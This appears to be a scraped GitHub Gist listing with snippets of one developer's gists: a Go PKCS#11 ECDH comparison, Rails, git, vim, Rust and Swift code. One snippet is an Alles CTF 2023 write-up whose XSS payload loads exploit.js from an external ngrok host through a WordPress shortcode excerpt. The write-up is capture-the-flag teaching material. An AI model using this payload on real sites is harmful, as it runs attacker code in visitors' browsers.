Skip to content

Instantly share code, notes, and snippets.

@jakecraige
jakecraige / writeup.md
Last active August 17, 2023 22:35
Writeup for Alles CTF 2023 "Such Popular Much Wow"

Make a post with the content as follows. You can enter it with the shortcode widget to not have to worry about formatting things.

[wpp excerpt_format=0 excerpt_length=1000 post_html='<li>{title} <img class="wpp-excerpt" src={summary}/></img></li>']

Make it have the excerpt:

x" onerror=d=document;s=d.createElement('script');s.src='//88c4-99-61-65-255.ngrok-free.app/exploit.js';document.head.append(s);//
@jakecraige
jakecraige / pkcs11-ecdh1-derive.go
Last active May 22, 2023 01:13
Example of the differences between deriving a non-sensitive ECDH key with `CKM_ECDH1_DERIVE` with SoftHSM2, AWS CloudHSM and YubiHSM2's PKCS#11 interface
/*
* This script shows an example of how with PKCS#11 ECDH1 key derivation and how it differs when
* communicating with SoftHSM2 vs AWS CloudHSM vs YubiHSM2. This seems to boil down to how they treat
* the `CKA_SENSITIVE` attribute on the derived key.
* - SoftHSM2 does what you expect, if you say it is sensitive it won't allow exporting. If you say
* it's not it will.
* - CloudHSM errors when you attempt to mark the derived key as not-sensitive. It behaves as
* expected when you say it is. AWS docs seem to indicate that the derived key is available on the
* "client" but it's unclear what client they are referring to, and it doesn't seem to be
@jakecraige
jakecraige / nested-rollback-failure.rb
Last active May 9, 2019 21:07
Sample test showcasing unexpected nested transaction handling in Rails
# frozen_string_literal: true
begin
require "bundler/inline"
rescue LoadError => e
$stderr.puts "Bundler version 1.10 or later is required. Please update your Bundler"
raise e
end
gemfile(true) do
comments to host images
@jakecraige
jakecraige / git-push-to-target.sh
Last active April 11, 2019 22:53
Script to allow for some fancy git workflows as described in https://wchargin.github.io/posts/managing-dependent-pull-requests/. I've extended it to also have features to support a style described in https://jg.gg/2018/09/29/stacked-diffs-versus-pull-requests/ via the --pick(-p) option
#!/bin/sh
#
# git-push-to-target: Force push with lease this commit to a branch specified in its
# commit description like `branch: jake/my-branch`:
#
# `git-push-to-target --query` will do a dry run and print the branch name it detects
# `git-push-to-target --pick` will pick this to it's own branch off master and push.
#
# Usage within an interative rebase, add this after each commit that contains the branch directive:
# > exec git push-to-target
@jakecraige
jakecraige / vimrc
Last active November 27, 2017 21:45 — forked from junegunn/vimrc
set nocompatible hidden laststatus=2
if !filereadable('/tmp/plug.vim')
silent !curl --insecure -fLo /tmp/plug.vim
\ https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
endif
source /tmp/plug.vim
call plug#begin('/tmp/plugged')
Plug 'junegunn/fzf', { 'do': './install --bin' }
@jakecraige
jakecraige / server.rs
Created August 5, 2017 21:21
First Rust Web App
extern crate iron;
extern crate logger;
extern crate env_logger;
extern crate router;
extern crate bodyparser;
extern crate persistent;
extern crate serde_json;
#[macro_use] extern crate serde_derive;
#[macro_use] extern crate diesel;
extern crate dotenv;
@jakecraige
jakecraige / protocol-instead-of-subclass.swift
Created September 2, 2016 23:47
Example of how to use a protocol where you might normally use a superclass. This is also more flexible because you can mix it into anything, even if you don't have control of the superclass.
import UIKit
import XCPlayground
// MARK: Implementation
protocol Page {
var name: String { get }
var details: String { get }
var asViewController: UIViewController { get }
}
private func cacheError(message: String) -> NSError {
return NSError(
domain: "",
code: 0,
userInfo: [NSLocalizedDescriptionKey: message]
)
}
class MyCacheDelegate: CacheDelegate {
private var modelCache: [String: SimpleModel] = [:]
private func cacheError(message: String) -> NSError {
return NSError(
domain: "",
code: 0,
userInfo: [NSLocalizedDescriptionKey: message]
)
}
class MyCacheDelegate: CacheDelegate {
private var modelCache: [String: SimpleModel] = [:]